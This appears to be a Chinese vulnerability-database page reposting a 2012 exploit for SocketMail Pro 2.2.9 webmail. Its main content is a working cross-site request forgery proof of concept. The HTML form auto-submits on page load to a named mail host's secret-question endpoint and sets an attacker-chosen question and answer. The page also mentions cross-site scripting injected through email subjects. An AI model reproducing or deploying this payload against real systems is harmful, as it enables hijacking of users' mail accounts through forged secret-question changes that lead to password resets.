SocketMail Pro 2.2.9 Cross Site Request Forgery / Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047582 漏洞类型
发布时间 2012-04-24 更新时间 2012-04-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040190
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#Title:SocketMail Pro version 2.2.9 CSRF (Cross Site Request Forgery) && XSS (Cross Site Scripting)
 #Author:MetaiZm
 #Software:SocketMail Pro version 2.2.9
 #Website:http://socketmail.com/
 #Tested on:Windows XP SP3

 # Description :
 Subject xss codes inject and email send
 -> Screen : http://s019.radikal.ru/i627/1204/e2/0ce8a6b54b52.jpg (XSS) # Author:B0T_25
 Cross Site Request Forgery Change to Secret question <-
 # PoC: http://pastebin.com/diSCcMXM (CSRF)

<form action="http://mail.hayastan.am/home/secretqtn.php" method=post name="signup">
<input type=hidden name='action' value='upd'>
<input type=text name="user_secret_qtn" size="30" maxlength="50" value="hayastan?">
<input type=text name="user_secret_answer" size="30" maxlength="50" value="sikdimseni">
<input type="submit" value="gonder"/>
</form>
 <script language="javascript">
  document.forms[0].submit()
                 </script>